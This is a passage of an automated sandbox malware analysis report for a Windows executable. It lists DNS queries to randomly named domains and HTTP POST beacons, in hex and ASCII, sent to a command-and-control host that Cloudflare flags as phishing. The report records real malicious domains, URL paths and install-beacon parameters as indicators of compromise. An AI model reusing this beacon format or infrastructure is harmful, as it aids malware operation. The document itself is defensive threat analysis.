                                                                                                                                                                Mar 7, 2021 19:21:28.684437037 CET53571728.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:28.692018032 CET5526753192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:28.751657963 CET53552678.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:31.046312094 CET5096953192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:31.102849007 CET53509698.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:31.269062042 CET6436253192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:31.326342106 CET53643628.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:37.662018061 CET5476653192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:37.708200932 CET53547668.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:37.908792973 CET6144653192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:37.965827942 CET53614468.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:38.079025984 CET5751553192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:38.144830942 CET53575158.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:40.938033104 CET5819953192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:40.986571074 CET53581998.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:49.864664078 CET6522153192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:49.923211098 CET53652218.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:21:50.647135973 CET6157353192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:21:50.709374905 CET53615738.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:22:01.804923058 CET5656253192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:22:01.860436916 CET53565628.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:22:33.053370953 CET5359153192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:22:33.099004030 CET53535918.8.8.8192.168.2.5
                                                                                                                                                                Mar 7, 2021 19:22:51.504885912 CET5968853192.168.2.58.8.8.8
                                                                                                                                                                Mar 7, 2021 19:22:51.574675083 CET53596888.8.8.8192.168.2.5

                                                                                                                                                                DNS Queries

                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                Mar 7, 2021 19:21:07.589586973 CET192.168.2.58.8.8.80xa783Standard query (0)c41676c07a61a961.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:07.658513069 CET192.168.2.58.8.8.80x51d0Standard query (0)a36e971e03d9cbf8.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:07.727015972 CET192.168.2.58.8.8.80xb423Standard query (0)9a3a97f6f45f2c2b.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:08.009263992 CET192.168.2.58.8.8.80x8e2fStandard query (0)c41676c07a61a961.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:08.079137087 CET192.168.2.58.8.8.80xa260Standard query (0)a36e971e03d9cbf8.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:08.392529964 CET192.168.2.58.8.8.80x77c8Standard query (0)c41676c07a61a961.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:08.508393049 CET192.168.2.58.8.8.80x5e81Standard query (0)a36e971e03d9cbf8.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:11.333648920 CET192.168.2.58.8.8.80xcd52Standard query (0)c41676c07a61a961.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:11.647021055 CET192.168.2.58.8.8.80xc14Standard query (0)a36e971e03d9cbf8.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:13.030141115 CET192.168.2.58.8.8.80xaaedStandard query (0)9a3a97f6f45f2c2b.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:15.486093998 CET192.168.2.58.8.8.80x8329Standard query (0)c41676c07a61a961.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:15.573966026 CET192.168.2.58.8.8.80x9507Standard query (0)a36e971e03d9cbf8.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:15.640500069 CET192.168.2.58.8.8.80xc1ffStandard query (0)9a3a97f6f45f2c2b.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:16.770473957 CET192.168.2.58.8.8.80x7306Standard query (0)c41676c07a61a961.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:16.848397017 CET192.168.2.58.8.8.80xc957Standard query (0)a36e971e03d9cbf8.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:16.907010078 CET192.168.2.58.8.8.80x5672Standard query (0)9a3a97f6f45f2c2b.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:21.586539984 CET192.168.2.58.8.8.80xc10fStandard query (0)c41676c07a61a961.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:21.657404900 CET192.168.2.58.8.8.80xfdceStandard query (0)a36e971e03d9cbf8.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:26.773996115 CET192.168.2.58.8.8.80xf0e8Standard query (0)c41676c07a61a961.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:26.839376926 CET192.168.2.58.8.8.80xe46fStandard query (0)a36e971e03d9cbf8.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:26.966716051 CET192.168.2.58.8.8.80x5c0eStandard query (0)c41676c07a61a961.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:27.033440113 CET192.168.2.58.8.8.80x910dStandard query (0)a36e971e03d9cbf8.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:28.205749989 CET192.168.2.58.8.8.80x25eeStandard query (0)c41676c07a61a961.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:28.292393923 CET192.168.2.58.8.8.80x879cStandard query (0)a36e971e03d9cbf8.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:28.447313070 CET192.168.2.58.8.8.80xbbc7Standard query (0)c41676c07a61a961.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:28.500910044 CET192.168.2.58.8.8.80x3720Standard query (0)a36e971e03d9cbf8.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:28.624905109 CET192.168.2.58.8.8.80x9323Standard query (0)c41676c07a61a961.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:28.692018032 CET192.168.2.58.8.8.80x462aStandard query (0)a36e971e03d9cbf8.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:31.046312094 CET192.168.2.58.8.8.80x9745Standard query (0)c41676c07a61a961.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:31.269062042 CET192.168.2.58.8.8.80xc92bStandard query (0)a36e971e03d9cbf8.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:37.662018061 CET192.168.2.58.8.8.80xce36Standard query (0)C41676C07A61A961.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:37.908792973 CET192.168.2.58.8.8.80xca6fStandard query (0)A36E971E03D9CBF8.comA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:38.079025984 CET192.168.2.58.8.8.80xe6f6Standard query (0)9A3A97F6F45F2C2B.comA (IP address)IN (0x0001)

                                                                                                                                                                DNS Answers

                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                Mar 7, 2021 19:21:07.649286032 CET8.8.8.8192.168.2.50xa783Name error (3)c41676c07a61a961.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:07.716602087 CET8.8.8.8192.168.2.50x51d0Name error (3)a36e971e03d9cbf8.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:07.783638954 CET8.8.8.8192.168.2.50xb423No error (0)9a3a97f6f45f2c2b.com104.21.6.78A (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:07.783638954 CET8.8.8.8192.168.2.50xb423No error (0)9a3a97f6f45f2c2b.com172.67.134.157A (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:08.063546896 CET8.8.8.8192.168.2.50x8e2fName error (3)c41676c07a61a961.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:08.136688948 CET8.8.8.8192.168.2.50xa260Name error (3)a36e971e03d9cbf8.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:08.441195965 CET8.8.8.8192.168.2.50x77c8Name error (3)c41676c07a61a961.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:08.568207026 CET8.8.8.8192.168.2.50x5e81Name error (3)a36e971e03d9cbf8.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:11.383660078 CET8.8.8.8192.168.2.50xcd52Name error (3)c41676c07a61a961.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:11.702745914 CET8.8.8.8192.168.2.50xc14Name error (3)a36e971e03d9cbf8.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:13.084464073 CET8.8.8.8192.168.2.50xaaedNo error (0)9a3a97f6f45f2c2b.com104.21.6.78A (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:13.084464073 CET8.8.8.8192.168.2.50xaaedNo error (0)9a3a97f6f45f2c2b.com172.67.134.157A (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:15.557291031 CET8.8.8.8192.168.2.50x8329Name error (3)c41676c07a61a961.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:15.629158020 CET8.8.8.8192.168.2.50x9507Name error (3)a36e971e03d9cbf8.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:15.694534063 CET8.8.8.8192.168.2.50xc1ffNo error (0)9a3a97f6f45f2c2b.com172.67.134.157A (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:15.694534063 CET8.8.8.8192.168.2.50xc1ffNo error (0)9a3a97f6f45f2c2b.com104.21.6.78A (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:16.824945927 CET8.8.8.8192.168.2.50x7306Name error (3)c41676c07a61a961.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:16.894583941 CET8.8.8.8192.168.2.50xc957Name error (3)a36e971e03d9cbf8.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:16.968422890 CET8.8.8.8192.168.2.50x5672No error (0)9a3a97f6f45f2c2b.com104.21.6.78A (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:16.968422890 CET8.8.8.8192.168.2.50x5672No error (0)9a3a97f6f45f2c2b.com172.67.134.157A (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:21.641230106 CET8.8.8.8192.168.2.50xc10fName error (3)c41676c07a61a961.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:21.714823961 CET8.8.8.8192.168.2.50xfdceName error (3)a36e971e03d9cbf8.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:26.832304955 CET8.8.8.8192.168.2.50xf0e8Name error (3)c41676c07a61a961.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:26.893809080 CET8.8.8.8192.168.2.50xe46fName error (3)a36e971e03d9cbf8.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:27.026211023 CET8.8.8.8192.168.2.50x5c0eName error (3)c41676c07a61a961.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:27.084645987 CET8.8.8.8192.168.2.50x910dName error (3)a36e971e03d9cbf8.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:28.251885891 CET8.8.8.8192.168.2.50x25eeName error (3)c41676c07a61a961.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:28.344765902 CET8.8.8.8192.168.2.50x879cName error (3)a36e971e03d9cbf8.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:28.493319988 CET8.8.8.8192.168.2.50xbbc7Name error (3)c41676c07a61a961.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:28.558232069 CET8.8.8.8192.168.2.50x3720Name error (3)a36e971e03d9cbf8.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:28.684437037 CET8.8.8.8192.168.2.50x9323Name error (3)c41676c07a61a961.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:28.751657963 CET8.8.8.8192.168.2.50x462aName error (3)a36e971e03d9cbf8.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:31.102849007 CET8.8.8.8192.168.2.50x9745Name error (3)c41676c07a61a961.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:31.326342106 CET8.8.8.8192.168.2.50xc92bName error (3)a36e971e03d9cbf8.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:37.708200932 CET8.8.8.8192.168.2.50xce36Name error (3)C41676C07A61A961.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:37.965827942 CET8.8.8.8192.168.2.50xca6fName error (3)A36E971E03D9CBF8.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:38.144830942 CET8.8.8.8192.168.2.50xe6f6No error (0)9A3A97F6F45F2C2B.com104.21.6.78A (IP address)IN (0x0001)
                                                                                                                                                                Mar 7, 2021 19:21:38.144830942 CET8.8.8.8192.168.2.50xe6f6No error (0)9A3A97F6F45F2C2B.com172.67.134.157A (IP address)IN (0x0001)

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • 9a3a97f6f45f2c2b.com

                                                                                                                                                                HTTP Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                0192.168.2.549719104.21.6.7880C:\Users\user\Desktop\IpB8f8qwze.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Mar 7, 2021 19:21:07.875020027 CET617OUTPOST //fine/send HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 79
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
                                                                                                                                                                Mar 7, 2021 19:21:07.875263929 CET618OUTData Raw: 74 79 70 65 3d 69 6e 73 74 61 6c 6c 26 73 65 6c 6c 65 72 3d 75 73 65 72 30 31 26 70 72 69 63 65 3d 2d 30 2e 31 26 67 75 69 64 3d 35 30 31 34 46 46 42 35 37 45 36 44 45 44 41 33 26 76 65 72 3d 35 31 2e 30 26 6f 72 69 67 69 6e 3d 65 78 65
                                                                                                                                                                Data Ascii: type=install&seller=user01&price=-0.1&guid=5014FFB57E6DEDA3&ver=51.0&origin=exe
                                                                                                                                                                Mar 7, 2021 19:21:07.938493967 CET619INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:07 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=dd2f2b376e6c7a2a4259cde814dbcfcb71615141267; expires=Tue, 06-Apr-21 18:21:07 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af8501c60000065a099df000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=5UEXfjplDfVGMPg73FjsPmY8kWp309qcsJnlAv%2BX1MyTCiJhcW5KoEuFL36CQI1A%2FDy4EaGT3CQ6dCM%2Fibs9jl4sFywsyRupA9mFpEuU1Ocyu8iQjw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d77c7806065a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chr
                                                                                                                                                                Mar 7, 2021 19:21:07.938528061 CET620INData Raw: 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22
                                                                                                                                                                Data Ascii: ome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,pro
                                                                                                                                                                Mar 7, 2021 19:21:07.938553095 CET622INData Raw: 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a
                                                                                                                                                                Data Ascii: > <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquir
                                                                                                                                                                Mar 7, 2021 19:21:07.938572884 CET623INData Raw: 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 54 72 75 73 74 20 26 61 6d 70 3b 20 53 61 66 65 74 79 20 74 65 61 6d 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f
                                                                                                                                                                Data Ascii: please contact the Trust &amp; Safety team for more information.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:tex
                                                                                                                                                                Mar 7, 2021 19:21:07.938590050 CET623INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                Mar 7, 2021 19:21:08.161528111 CET625OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 81
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
                                                                                                                                                                Mar 7, 2021 19:21:08.161767960 CET625OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 61 74 57 64 54 75 4b 73 32 33 32 69 49 42 48 71 50 7a 77 53 43 59 7e
                                                                                                                                                                Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVatWdTuKs232iIBHqPzwSCY~
                                                                                                                                                                Mar 7, 2021 19:21:08.215107918 CET627INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:08 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=dd545e47b452c86c965fe3fab796d3f111615141268; expires=Tue, 06-Apr-21 18:21:08 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af8502e50000065aff25e000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=uepZQ4jeqLAhyAT5F05SHO6yvipvSo5EMUR92WeMPwh9MjQ6UaHQe5kRJy7U6Q0JFHWACXW%2B%2Bi9qIDopCW%2BpdsUJG50%2BrGFT5FLMa8kK%2FjodJeinnw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d77e3d14065a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge
                                                                                                                                                                Mar 7, 2021 19:21:08.215140104 CET628INData Raw: 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
